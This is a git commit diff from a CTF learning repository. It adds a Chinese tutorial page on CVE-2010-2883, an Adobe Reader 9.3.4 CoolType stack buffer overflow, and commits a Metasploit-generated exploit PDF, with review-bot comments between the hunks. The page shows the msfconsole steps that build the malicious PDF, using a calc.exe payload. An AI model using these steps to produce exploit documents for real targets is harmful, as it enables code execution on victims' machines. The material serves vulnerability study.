mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-25 11:41:16 +07:00
add 7.1.8
parent
1ce79c2974
commit
f1c51d8ea3
@ -174,6 +174,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
|||||||
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
|
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
|
||||||
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
|
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
|
||||||
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
|
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
|
||||||
|
* [7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow](doc/7.1.8_adobe_reader_2010-2883.md)
|
||||||
* Malware
|
* Malware
|
||||||
* [八、学术篇](doc/8_academic.md)
|
* [八、学术篇](doc/8_academic.md)
|
||||||
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)
|
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)
|
||||||
|
52
doc/7.1.8_adobe_reader_2010-2883.md
Normal file
@ -0,0 +1,52 @@
|
|||||||
|
# 7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow
|
||||||
|
|
||||||
|
- [漏洞描述](#漏洞描述)
|
||||||
|
- [漏洞复现](#漏洞复现)
|
||||||
|
- [漏洞分析](#漏洞分析)
|
||||||
|
- [参考资料](#参考资料)
|
||||||
|
|
||||||
|
|
||||||
|
[下载文件](../src/exploit/7.1.8_adobe_reader_2010-2883)
|
||||||
|
|
||||||
|
## 漏洞描述
|
||||||
|
Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有 TTF 字体的 Smart INdependent Glyphlets (SING) 表格中超长字段的 PDF 文件执行任意代码或者导致拒绝服务。
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
| |推荐使用的环境 | 备注 |
|
||||||
|
| --- | --- | --- |
|
||||||
|
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||||||
|
| 调试器 | WinDbg | 版本号:10.0 x86 |
|
||||||
|
| 漏洞软件 | Adobe Reader | 版本号:9.3.4 |
|
||||||
|
|
||||||
|
我们利用 Metasploit 来生成攻击样本:
|
||||||
|
```
|
||||||
|
msf > search cve-2010-2883
|
||||||
|
Name Disclosure Date Rank Description
|
||||||
|
---- --------------- ---- -----------
|
||||||
|
exploit/windows/fileformat/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
|
||||||
|
|
||||||
|
msf > use exploit/windows/fileformat/adobe_cooltype_sing
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/exec
|
||||||
|
payload => windows/exec
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > set cmd calc.exe
|
||||||
|
cmd => calc.exe
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > set filename cve20102883.pdf
|
||||||
|
filename => cve20102883.pdf
|
||||||
|
|
||||||
|
msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit
|
||||||
|
[*] Creating 'cve20102883.pdf' file...
|
||||||
|
[+] cve20102883.pdf stored at /home/firmy/.msf4/local/cve20102883.pdf
|
||||||
|
```
|
||||||
|
|
||||||
|
使用漏洞版本的 Adobe Reader 打开样本,即可弹出计算器:
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞分析
|
||||||
|
|
||||||
|
## 参考资料
|
||||||
|
- 《漏洞战争》
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2883/
|
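Review bot: The `## 漏洞分析` (vulnerability analysis) section near the end of the new file is empty: the heading is followed directly by `## 参考资料`, although the table of contents at the top of the file links to it. Add the analysis or mark the section as pending so the page does not read as complete. Two smaller points in the same file: the sentence `使用漏洞版本的 Adobe Reader 打开样本,即可弹出计算器:` ends with a colon and nothing follows it, so either add the screenshot or output it introduces or close the sentence; and the description under `## 漏洞描述` speaks only of an overlong field in the SING table, while the Metasploit listing further down names that field as "uniqueName", which would be worth stating in the description.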
@ -8,4 +8,5 @@
|
|||||||
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
|
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
|
||||||
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
|
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
|
||||||
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
|
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
|
||||||
|
* [7.1.8 [CVE-2010-2883] Adobe Reader 9.3.4 Stack Buffer Overflow](7.1.8_adobe_reader_2010-2883.md)
|
||||||
* Malware
|
* Malware
|
||||||
|
@ -8,6 +8,7 @@
|
|||||||
- [PortEx Analyzer](#portex-analyzer)
|
- [PortEx Analyzer](#portex-analyzer)
|
||||||
- [Resource Hacker](#resource-hacker)
|
- [Resource Hacker](#resource-hacker)
|
||||||
- [wxHexEditor](#wxhexeditor)
|
- [wxHexEditor](#wxhexeditor)
|
||||||
|
- [PDF Stream Dumper](#pdf-stream-dumper)
|
||||||
|
|
||||||
|
|
||||||
## 010 Editor
|
## 010 Editor
|
||||||
@ -35,3 +36,6 @@ http://www.angusj.com/resourcehacker/
|
|||||||
|
|
||||||
## wxHexEditor
|
## wxHexEditor
|
||||||
http://www.wxhexeditor.org/
|
http://www.wxhexeditor.org/
|
||||||
|
|
||||||
|
## PDF Stream Dumper
|
||||||
|
http://sandsprite.com/blogs/index.php?uid=7&pid=57
|
||||||
|
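Review bot: The new `## PDF Stream Dumper` section consists of a bare URL, and that URL (`http://sandsprite.com/blogs/index.php?uid=7&pid=57`) identifies a blog post only by query-string ids, so a reader gets no hint of what the tool does if the link stops resolving. Add a one-line description of the tool under the heading as a fallback for link rot.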
BIN
src/exploit/7.1.8_adobe_reader_2010-2883/cve20102883.pdf
Normal file
Binary file not shown.
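Review bot: `src/exploit/7.1.8_adobe_reader_2010-2883/cve20102883.pdf` is committed as a raw binary, and according to the steps in `doc/7.1.8_adobe_reader_2010-2883.md` it is the Metasploit-generated sample for CVE-2010-2883. A live sample in the tree is likely to be flagged or quarantined by endpoint scanners on clone and can be opened by accident in a vulnerable reader; consider shipping it inside a password-protected archive with the password stated in the doc, or dropping the binary, since the documented msf steps already regenerate it. Recording a hash of the sample in the doc would also let readers confirm they are working with the same file.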